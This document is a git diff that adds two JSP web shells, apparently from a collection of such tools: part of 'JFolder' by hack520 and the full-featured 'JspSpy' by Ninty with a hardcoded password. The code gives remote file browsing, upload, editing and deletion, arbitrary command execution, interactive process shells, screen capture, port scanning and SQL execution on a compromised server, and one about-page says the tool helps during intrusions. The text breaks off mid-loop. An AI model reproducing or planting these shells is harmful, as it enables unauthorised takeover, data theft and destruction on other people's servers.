+ public void setSessionTime(String sessionTime) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\d+");
+ Matcher m = p.matcher(sessionTime);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("session超时时间只能填数字");
+ }
+
+ p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime);
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序体已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime);
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException {
+ Pattern p = Pattern.compile("\\w+");
+ Matcher m = null;
+ int i;
+ String fileTypes = "";
+ String tmpFileTypes = "";
+
+ for (i = 0; i < textFileTypes.length; i ++) {
+ m = p.matcher(textFileTypes[i]);
+
+ if (! m.matches()) {
+ throw new JshellConfigException("扩展名只能是字母数字和下划线的组合");
+ }
+
+ if (i != textFileTypes.length - 1)
+ fileTypes += "\"" + textFileTypes[i] + "\"" + ", ";
+ else
+ fileTypes += "\"" + textFileTypes[i] + "\"";
+ }
+
+ for (i = 0; i < _textFileTypes.length; i ++) {
+ if (i != _textFileTypes.length - 1)
+ tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", ";
+ else
+ tmpFileTypes += "\"" + _textFileTypes[i] + "\"";
+ }
+
+ p = Pattern.compile(tmpFileTypes);
+ m = p.matcher(_jshellContent);
+
+ if (! m.find()) {
+ throw new JshellConfigException("程序文件已经被非法修改");
+ }
+
+ _jshellContent = m.replaceAll(fileTypes);
+
+ //return HTMLEncode(_jshellContent);
+ }
+
+ public String getContent() {
+ return HTMLEncode(_jshellContent);
+ }
+}
+
+class JshellConfigException extends Exception {
+ public JshellConfigException(String message) {
+ super(message);
+ }
+}
+%>
+
+
+JFolder 华夏猪头三修改版
+
+
+
+
+
+
+ 8 管理登录 :::... JFolder _By_hack520
+
+
+
+
+
+
哎呀,倒霉死啦!
");
+ out.close();
+ return;
+ }
+
+ session.setAttribute("password", password);
+ } else {
+ password = (String)session.getAttribute("password");
+ }
+
+ String action = null;
+
+
+ if (request.getParameter("action") == null)
+ action = "main";
+ else
+ action = (String)request.getParameter("action");
+
+ if (action.equals("exit")) {
+ session.removeAttribute("password");
+ response.sendRedirect(request.getRequestURI());
+ out.close();
+ return;
+ }
+
+// show the main menu
+//====================================================================================
+%>
+
+<%
+//=====================================================================================
+// end of main menu
+
+ if (action.equals("main")) {
+// print the system info table
+//=======================================================================================
+%>
+
+
+ 服务器信息
+
+
+ 服务器名
+ <%=request.getServerName()%>
+
+
+ 服务器端口
+ <%=request.getServerPort()%>
+
+
+ 操作系统
+ <%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
+
+
+ 当前用户名
+ <%=System.getProperty("user.name")%>
+
+
+ 当前用户目录
+ <%=System.getProperty("user.home")%>
+
+
+ 当前用户工作目录
+ <%=System.getProperty("user.dir")%>
+
+
+ 程序相对路径
+ <%=request.getRequestURI()%>
+
+
+ 程序绝对路径
+ <%=request.getRealPath(request.getServletPath())%>
+
+
+ 网络协议
+ <%=request.getProtocol()%>
+
+
+ 服务器软件版本信息
+ <%=application.getServerInfo()%>
+
+
+ JDK版本
+ <%=System.getProperty("java.version")%>
+
+
+ JDK安装路径
+ <%=System.getProperty("java.home")%>
+
+
+ JAVA虚拟机版本
+ <%=System.getProperty("java.vm.specification.version")%>
+
+
+ JAVA虚拟机名
+ <%=System.getProperty("java.vm.name")%>
+
+
+ JAVA类路径
+ <%=System.getProperty("java.class.path")%>
+
+
+ JAVA载入库搜索路径
+ <%=System.getProperty("java.library.path")%>
+
+
+ JAVA临时目录
+ <%=System.getProperty("java.io.tmpdir")%>
+
+
+ JIT编译器名
+ <%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
+
+
+ 扩展目录路径
+ <%=System.getProperty("java.ext.dirs")%>
+
+
+ 客户端信息
+
+
+ 客户机地址
+ <%=request.getRemoteAddr()%>
+
+
+ 服务机器名
+ <%=request.getRemoteHost()%>
+
+
+ 用户名
+ <%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
+
+
+ 请求方式
+ <%=request.getScheme()%>
+
+
+ 应用安全套接字层
+ <%=request.isSecure() == true ? "是" : "否"%>
+
+
+<%
+//=======================================================================================
+// end of printing the system info table
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("filesystem")) {
+ String curPath = "";
+ String result = "";
+ String fsAction = "";
+
+ if (request.getParameter("curPath") == null) {
+ curPath = request.getRealPath(request.getServletPath());
+ curPath = pathConvert((new File(curPath)).getParent());
+ } else {
+ curPath = Unicode2GB((String)request.getParameter("curPath"));
+ }
+
+ if (request.getParameter("fsAction") == null) {
+ fsAction = "list";
+ } else {
+ fsAction = (String)request.getParameter("fsAction");
+ }
+
+ if (fsAction.equals("list"))
+ result = listFiles(curPath, request.getRequestURI() + "?action=" + action);
+ else if (fsAction.equals("browse")) {
+ result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action);
+ result += browseFile(curPath);
+ }
+ else if (fsAction.equals("open"))
+ result = openFile(curPath, request.getRequestURI() + "?action=" + action);
+ else if (fsAction.equals("save")) {
+ if (request.getParameter("fileContent") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
+ result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent);
+ }
+ } else if (fsAction.equals("createFolder")) {
+ if (request.getParameter("folderName") == null) {
+ result = "目录名不能为空 ";
+ } else {
+ String folderName = Unicode2GB(request.getParameter("folderName").trim());
+ if (folderName.equals("")) {
+ result = "目录名不能为空 ";
+ } else {
+ result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName);
+ }
+ }
+ } else if (fsAction.equals("createFile")) {
+ if (request.getParameter("fileName") == null) {
+ result = "文件名不能为空 ";
+ } else {
+ String fileName = Unicode2GB(request.getParameter("fileName").trim());
+ if (fileName.equals("")) {
+ result = "文件名不能为空 ";
+ } else {
+ result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName);
+ }
+ }
+ } else if (fsAction.equals("deleteFile")) {
+ if (request.getParameter("filesDelete") == null) {
+ result = "没有选择要删除的文件 ";
+ } else {
+ String[] files2Delete = (String[])request.getParameterValues("filesDelete");
+ if (files2Delete.length == 0) {
+ result = "没有选择要删除的文件 ";
+ } else {
+ for (int n = 0; n < files2Delete.length; n ++) {
+ files2Delete[n] = Unicode2GB(files2Delete[n]);
+ }
+ result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete);
+ }
+ }
+ } else if (fsAction.equals("saveAs")) {
+ if (request.getParameter("fileContent") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String fileContent = Unicode2GB(request.getParameter("fileContent"));
+ result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent);
+ }
+ } else if (fsAction.equals("upload")) {
+ result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
+ } else if (fsAction.equals("copyto")) {
+ if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) {
+ result = "没有选择要复制的文件 ";
+ } else {
+ String[] files2Copy = request.getParameterValues("filesDelete");
+ String dstPath = request.getParameter("dstPath").trim();
+ if (files2Copy.length == 0) {
+ result = "没有选择要复制的文件 ";
+ } else if (dstPath.equals("")) {
+ result = "没有填写要复制到的目录路径 ";
+ } else {
+ for (int i = 0; i < files2Copy.length; i ++)
+ files2Copy[i] = Unicode2GB(files2Copy[i]);
+
+ result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath));
+ }
+ }
+ } else if (fsAction.equals("rename")) {
+ if (request.getParameter("fileRename") == null) {
+ result = "页面导航错误 ";
+ } else {
+ String file2Rename = request.getParameter("fileRename").trim();
+ String newName = request.getParameter("newName").trim();
+ if (file2Rename.equals("")) {
+ result = "没有选择要重命名的文件 ";
+ } else if (newName.equals("")) {
+ result = "没有填写新文件名 ";
+ } else {
+ result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName));
+ }
+ }
+ }
+%>
+
+
+
+ <%= result.trim().equals("")?" " : result%>
+
+
+<%
+/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("command")) {
+ String cmd = "";
+ InputStream ins = null;
+ String result = "";
+
+ if (request.getParameter("command") != null) {
+ cmd = (String)request.getParameter("command");
+ result = exeCmd(cmd);
+ }
+// print the command form
+//========================================================================================
+%>
+
+
+
+ <%=result == "" ? " " : result%>
+
+
+<%
+//=========================================================================================
+// end of printing command form
+///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("database")) {
+ String dbAction = "";
+ String result = "";
+ String dbType = "";
+ String dbServer = "";
+ String dbPort = "";
+ String dbUsername = "";
+ String dbPassword = "";
+ String dbName = "";
+ String dbResult = "";
+ String sql = "";
+
+ if (request.getParameter("dbAction") == null) {
+ dbAction = "main";
+ } else {
+ dbAction = request.getParameter("dbAction").trim();
+ if (dbAction.equals(""))
+ dbAction = "main";
+ }
+
+ if (dbAction.equals("main")) {
+ result = " ";
+ } else if (dbAction.equals("dbConnect")) {
+ if (request.getParameter("dbType") == null ||
+ request.getParameter("dbServer") == null ||
+ request.getParameter("dbPort") == null ||
+ request.getParameter("dbUsername") == null ||
+ request.getParameter("dbPassword") == null ||
+ request.getParameter("dbName") == null) {
+ response.sendRedirect(request.getRequestURI() + "?action=" + action);
+ } else {
+ dbType = request.getParameter("dbType").trim();
+ dbServer = request.getParameter("dbServer").trim();
+ dbPort = request.getParameter("dbPort").trim();
+ dbUsername = request.getParameter("dbUsername").trim();
+ dbPassword = request.getParameter("dbPassword").trim();
+ dbName = request.getParameter("dbName").trim();
+
+ if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) {
+ if (DBConnect(dbUsername, dbPassword)) {
+ if (request.getParameter("sql") != null) {
+ sql = request.getParameter("sql").trim();
+ if (! sql.equals("")) {
+ dbResult = DBExecute(sql);
+ }
+ }
+
+ result = "\n";
+ result += "sql语句数据库连接失败 ";
+ }
+ } else {
+ result = "数据库连接驱动没有找到 ";
+ }
+ }
+ }
+%>
+
+
+
+
+
+ <%=dbResult%>
+
+
+
+<%
+
+////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+ } else if (action.equals("config")) {
+ String cfAction = "";
+ int i;
+
+ if (request.getParameter("cfAction") == null) {
+
+ cfAction = "main";
+ } else {
+ cfAction = request.getParameter("cfAction").trim();
+ if (cfAction.equals(""))
+ cfAction = "main";
+ }
+
+ if (cfAction.equals("main")) {
+// start of config form
+//==========================================================================================
+%>
+
+
+<%
+ } else if (cfAction.equals("save")) {
+ if (request.getParameter("password") == null ||
+ request.getParameter("encode") == null ||
+ request.getParameter("sessionTime") == null ||
+ request.getParameterValues("textFileTypes") == null) {
+ response.sendRedirect(request.getRequestURI());
+ }
+
+ String result = "";
+
+ String newPassword = request.getParameter("password").trim();
+ String newEncodeType = request.getParameter("encode").trim();
+ String newSessionTime = request.getParameter("sessionTime").trim();
+ String[] newTextFileTypes = request.getParameterValues("textFileTypes");
+ String jshellPath = request.getRealPath(request.getServletPath());
+
+ try {
+ JshellConfig jconfig = new JshellConfig(jshellPath);
+ jconfig.setPassword(newPassword);
+ jconfig.setEncodeType(newEncodeType);
+ jconfig.setSessionTime(newSessionTime);
+ jconfig.setTextFileTypes(newTextFileTypes);
+ jconfig.save();
+ result += "设置保存成功,正在返回,请稍候……";
+ result += "" + e.getMessage() + " ";
+ }
+
+%>
+
+
+ <%=result == "" ? " " : result%>
+
+
+<%
+ }
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
+//==========================================================================================
+// end of config form
+ } else if (action.equals("about")) {
+// start of about
+//==========================================================================================
+%>
+
+
+ 关于 jshell ver 0.1
+
+
+ 增加了显示alxea排名的功能,这对于入侵中也比较方便些,版权还是归作者的.
+
+
+ hack520 by hack520 and welcome to 华夏黑客同盟
+
+
+<%
+//==========================================================================================
+ }
+}
+%>
+
+
diff --git a/jsp/jspbrowser/1.jsp b/jsp/jspbrowser/1.jsp
new file mode 100644
index 0000000..ccdfb25
--- /dev/null
+++ b/jsp/jspbrowser/1.jsp
@@ -0,0 +1,2344 @@
+<%@page pageEncoding="utf-8"%>
+<%@page import="java.io.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.util.regex.*"%>
+<%@page import="java.sql.*"%>
+<%@page import="java.nio.charset.*"%>
+<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
+<%@page import="java.text.*"%>
+<%@page import="java.net.*"%>
+<%@page import="java.util.zip.*"%>
+<%@page import="java.awt.*"%>
+<%@page import="java.awt.image.*"%>
+<%@page import="javax.imageio.*"%>
+<%@page import="java.awt.datatransfer.DataFlavor"%>
+<%@page import="java.util.prefs.Preferences"%>
+<%!
+/**
+* Code By Ninty
+* Date 2009-12-17
+* Blog http://www.Forjj.com/
+* Yue . I Love You.
+*/
+private static final String PW = "kity"; //password
+private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
+private static final String REQUEST_CHARSET = "ISO-8859-1";
+private static final String PAGE_CHARSET = "UTF-8";
+private static final String CURRENT_DIR = "currentdir";
+private static final String MSG = "SHOWMSG";
+private static final String PORT_MAP = "PMSA";
+private static final String DBO = "DBO";
+private static final String SHELL_ONLINE = "SHELL_ONLINE";
+private static String SHELL_NAME = "";
+private static String WEB_ROOT = null;
+private static String SHELL_DIR = null;
+public static Map ins = new HashMap();
+private static class MyRequest extends HttpServletRequestWrapper {
+public MyRequest(HttpServletRequest req) {
+super(req);
+}
+public String getParameter(String name) {
+try {
+String value = super.getParameter(name);
+if (name == null)
+return null;
+return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
+} catch (Exception e) {
+return null;
+}
+}
+}
+private static class DBOperator{
+private Connection conn = null;
+private Statement stmt = null;
+private String driver;
+private String url;
+private String uid;
+private String pwd;
+public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
+this(driver,url,uid,pwd,false);
+}
+public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
+Class.forName(driver);
+if (connect)
+this.conn = DriverManager.getConnection(url,uid,pwd);
+this.url = url;
+this.driver = driver;
+this.uid = uid;
+this.pwd = pwd;
+}
+public void connect() throws Exception{
+this.conn = DriverManager.getConnection(url,uid,pwd);
+}
+public Object execute(String sql) throws Exception {
+if (isValid()) {
+stmt = conn.createStatement();
+if (stmt.execute(sql)) {
+return stmt.getResultSet();
+} else {
+return stmt.getUpdateCount();
+}
+}
+throw new Exception("Connection is inValid.");
+}
+public void closeStmt() throws Exception{
+if (this.stmt != null)
+stmt.close();
+}
+public boolean isValid() throws Exception {
+return conn != null && !conn.isClosed();
+}
+public void close() throws Exception {
+if (isValid()) {
+closeStmt();
+conn.close();
+}
+}
+public boolean equals(Object o) {
+if (o instanceof DBOperator) {
+DBOperator dbo = (DBOperator)o;
+return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
+}
+return false;
+}
+}
+private static class StreamConnector extends Thread {
+private InputStream is;
+private OutputStream os;
+public StreamConnector( InputStream is, OutputStream os ){
+this.is = is;
+this.os = os;
+}
+public void run(){
+BufferedReader in = null;
+BufferedWriter out = null;
+try{
+in = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[8192];
+int length;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+out.write( buffer, 0, length );
+out.flush();
+}
+} catch(Exception e){}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){}
+}
+}
+private static class OnLineProcess {
+private String cmd = "first";
+private Process pro;
+public OnLineProcess(Process p){
+this.pro = p;
+}
+public void setPro(Process p) {
+this.pro = p;
+}
+public void setCmd(String c){
+this.cmd = c;
+}
+public String getCmd(){
+return this.cmd;
+}
+public Process getPro(){
+return this.pro;
+}
+public void stop(){
+this.pro.destroy();
+}
+}
+private static class OnLineConnector extends Thread {
+private OnLineProcess ol = null;
+private InputStream is;
+private OutputStream os;
+private String name;
+public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
+this.is = is;
+this.os = os;
+this.name = name;
+this.ol = ol;
+}
+public void run(){
+BufferedReader in = null;
+BufferedWriter out = null;
+try{
+in = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[128];
+if(this.name.equals("exeRclientO")) {
+//from exe to client
+int length = 0;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+String str = new String(buffer, 0, length);
+str = str.replace("&","&").replace("<","<").replace(">",">");
+str = str.replace(""+(char)13+(char)10," rows = null;
+private boolean echoTableTag = false;
+public void setEchoTableTag(boolean v) {
+this.echoTableTag = v;
+}
+public Table(){
+this.rows = new ArrayList();
+}
+public void addRow(Row r) {
+this.rows.add(r);
+}
+public String toString(){
+StringBuilder html = new StringBuilder();
+if (echoTableTag)
+html.append("");
+for (Row r:rows) {
+html.append("");
+for (Column c:r.getColumns()) {
+html.append("");
+String vv = Util.htmlEncode(Util.getStr(c.getValue()));
+if (vv.equals(""))
+vv = " ";
+html.append(vv);
+html.append(" ");
+}
+html.append(" ");
+}
+if (echoTableTag)
+html.append("
");
+return html.toString();
+}
+}
+private static class Row{
+private ArrayList cols = null;
+public Row(){
+this.cols = new ArrayList();
+}
+public void addColumn(Column n) {
+this.cols.add(n);
+}
+public ArrayList getColumns(){
+return this.cols;
+}
+}
+private static class Column{
+private String value;
+public Column(String v){
+this.value = v;
+}
+public String getValue(){
+return this.value;
+}
+}
+private static class Util{
+public static boolean isEmpty(String s) {
+return s == null || s.trim().equals("");
+}
+public static boolean isEmpty(Object o) {
+return o == null || isEmpty(o.toString());
+}
+public static String getSize(long size,char danwei) {
+if (danwei == 'M') {
+double v = formatNumber(size / 1024.0 / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'G');
+}else {
+return v + "M";
+}
+} else if (danwei == 'G') {
+return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G";
+} else if (danwei == 'K') {
+double v = formatNumber(size / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'M');
+} else {
+return v + "K";
+}
+} else if (danwei == 'B') {
+if (size > 1024) {
+return getSize(size,'K');
+}else {
+return size + "B";
+}
+}
+return ""+0+danwei;
+}
+public static double formatNumber(double value,int l) {
+NumberFormat format = NumberFormat.getInstance();
+format.setMaximumFractionDigits(l);
+format.setGroupingUsed(false);
+return new Double(format.format(value));
+}
+public static boolean isInteger(String v) {
+if (isEmpty(v))
+return false;
+return v.matches("^\\d+$");
+}
+public static String formatDate(long time) {
+SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
+return format.format(new java.util.Date(time));
+}
+public static String convertPath(String path) {
+return path != null ? path.replace("\\","/") : "";
+}
+public static String htmlEncode(String v) {
+if (isEmpty(v))
+return "";
+return v.replace("&","&").replace("<","<").replace(">",">");
+}
+public static String getStr(String s) {
+return s == null ? "" :s;
+}
+public static String getStr(Object s) {
+return s == null ? "" :s.toString();
+}
+public static String exec(String regex, String str, int group) {
+Pattern pat = Pattern.compile(regex);
+Matcher m = pat.matcher(str);
+if (m.find())
+return m.group(group);
+return null;
+}
+public static void outMsg(Writer out,String msg) throws Exception {
+outMsg(out,msg,"center");
+}
+public static void outMsg(Writer out,String msg,String align) throws Exception {
+if (msg.indexOf("java.lang.ClassNotFoundException") != -1)
+msg = "Can Not Find The Driver!"+msg+"
");
+}
+}
+private static class UploadBean {
+private String fileName = null;
+private String suffix = null;
+private String savePath = "";
+private ServletInputStream sis = null;
+private byte[] b = new byte[1024];
+public UploadBean() {
+}
+public void setSavePath(String path) {
+this.savePath = path;
+}
+public void parseRequest(HttpServletRequest request) throws IOException {
+sis = request.getInputStream();
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!= -1) {
+s = new String(b, 0, a,PAGE_CHARSET);
+if ((k = s.indexOf("filename=\""))!= -1) {
+s = s.substring(k + 10);
+k = s.indexOf("\"");
+s = s.substring(0, k);
+File tF = new File(s);
+if (tF.isAbsolute()) {
+fileName = tF.getName();
+} else {
+fileName = s;
+}
+k = s.lastIndexOf(".");
+suffix = s.substring(k + 1);
+upload();
+}
+}
+}
+private void upload() {
+try {
+FileOutputStream out = new FileOutputStream(new File(savePath,fileName));
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!=-1) {
+s = new String(b, 0, a);
+if ((k = s.indexOf("Content-Type:"))!=-1) {
+break;
+}
+}
+sis.readLine(b,0,b.length);
+while ((a = sis.readLine(b,0,b.length)) != -1) {
+s = new String(b, 0, a);
+if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
+break;
+}
+out.write(b, 0, a);
+}
+out.close();
+} catch (IOException ioe) {
+ioe.printStackTrace();
+}
+}
+}
+%>
+<%
+SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1);
+String myAbsolutePath = application.getRealPath(request.getServletPath());
+if (Util.isEmpty(myAbsolutePath)) {//for weblogic
+SHELL_NAME = request.getServletPath();
+myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString();
+SHELL_NAME=request.getContextPath()+SHELL_NAME;
+WEB_ROOT = new File(application.getResource("/").getPath()).toString();
+} else {
+WEB_ROOT = application.getRealPath("/");
+}
+SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator)));
+if (session.getAttribute(CURRENT_DIR) == null)
+session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR));
+request = new MyRequest(request);
+if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
+String o = request.getParameter("o");
+if (o != null && o.equals("login")) {
+ins.get("login").invoke(request,response,session);
+return;
+} else if (o != null && o.equals("vLogin")) {
+ins.get("vLogin").invoke(request,response,session);
+return;
+} else {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+}
+}
+%>
+<%!
+private static interface Invoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception;
+public boolean doBefore();
+public boolean doAfter();
+}
+private static class DefaultInvoker implements Invoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+}
+public boolean doBefore(){
+return true;
+}
+public boolean doAfter() {
+return true;
+}
+}
+private static class ScriptInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BeforeInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("JspSpy Codz By - Ninty ");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class AfterInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DeleteBatchInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (!Util.isEmpty(files)) {
+String currentDir = JSession.getAttribute(CURRENT_DIR).toString();
+String[] arr = files.split(",");
+for (String fs:arr) {
+File f = new File(currentDir,fs);
+f.delete();
+}
+}
+JSession.setAttribute(MSG,"Delete Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class ClipBoardInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VRemoteControlInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+out.println("");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//GetScreen
+private static class GcInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Dimension size = Toolkit.getDefaultToolkit().getScreenSize();
+Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight());
+BufferedImage img = new Robot().createScreenCapture(rec);
+response.setContentType("image/jpeg");
+ImageIO.write(img,"jpg",response.getOutputStream());
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VPortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+if (Util.isEmpty(ip))
+ip = "127.0.0.1";
+if (Util.isEmpty(ports))
+ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
+if (Util.isEmpty(timeout))
+timeout = "2";
+out.println(""+
+"PortScan >> "+
+""+
+"
");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class PortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+ins.get("vPortScan").invoke(request,response,JSession);
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+int iTimeout = 0;
+if (Util.isEmpty(ip) || Util.isEmpty(ports))
+return;
+if (!Util.isInteger(timeout)) {
+timeout = "2";
+}
+iTimeout = Integer.parseInt(timeout);
+Map rs = new LinkedHashMap();
+String[] portArr = ports.split(",");
+for (String port:portArr) {
+try {
+Socket s = new Socket();
+s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout);
+s.close();
+rs.put(port,"Open");
+} catch (Exception e) {
+rs.put(port,"Close");
+}
+}
+out.println("");
+Set> entrySet = rs.entrySet();
+for (Map.Entry e:entrySet) {
+String port = e.getKey();
+String value = e.getValue();
+out.println(ip+" : "+port+" ................................. "+value+"
");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VConnInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object obj = JSession.getAttribute(DBO);
+if (obj == null || !((DBOperator)obj).isValid()) {
+out.println(" ");
+out.println("");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//DBConnect
+private static class DbcInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String driver = request.getParameter("driver");
+String url = request.getParameter("url");
+String uid = request.getParameter("uid");
+String pwd = request.getParameter("pwd");
+String sql = request.getParameter("sql");
+String selectDb = request.getParameter("selectDb");
+if (selectDb == null)
+selectDb = JSession.getAttribute("selectDb").toString();
+else
+JSession.setAttribute("selectDb",selectDb);
+Object dbo = JSession.getAttribute(DBO);
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+if (dbo != null)
+((DBOperator)dbo).close();
+dbo = new DBOperator(driver,url,uid,pwd,true);
+} else {
+if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) {
+DBOperator oldDbo = (DBOperator)dbo;
+dbo = new DBOperator(driver,url,uid,pwd);
+if (!oldDbo.equals(dbo)) {
+((DBOperator)oldDbo).close();
+((DBOperator)dbo).connect();
+} else {
+dbo = oldDbo;
+}
+}
+}
+DBOperator Ddbo = (DBOperator)dbo;
+JSession.setAttribute(DBO,Ddbo);
+Util.outMsg(out,"Connect To DataBase Success!");
+out.println(" ");
+out.println("");
+} catch (Exception e) {
+//e.printStackTrace();
+throw e;
+}
+}
+}
+private static class ExecuteSQLInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String sql = request.getParameter("sql");
+String db = request.getParameter("selectDb");
+Object dbo = JSession.getAttribute(DBO);
+if (!Util.isEmpty(sql)) {
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+response.sendRedirect(SHELL_NAME+"?o=vConn");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+Object obj = ((DBOperator)dbo).execute(sql);
+if (obj instanceof ResultSet) {
+ResultSet rs = (ResultSet)obj;
+ResultSetMetaData meta = rs.getMetaData();
+int colCount = meta.getColumnCount();
+out.println("Query#0 : "+Util.htmlEncode(sql)+"
");
+out.println("
");
+for (int i=1;i<=colCount;i++) {
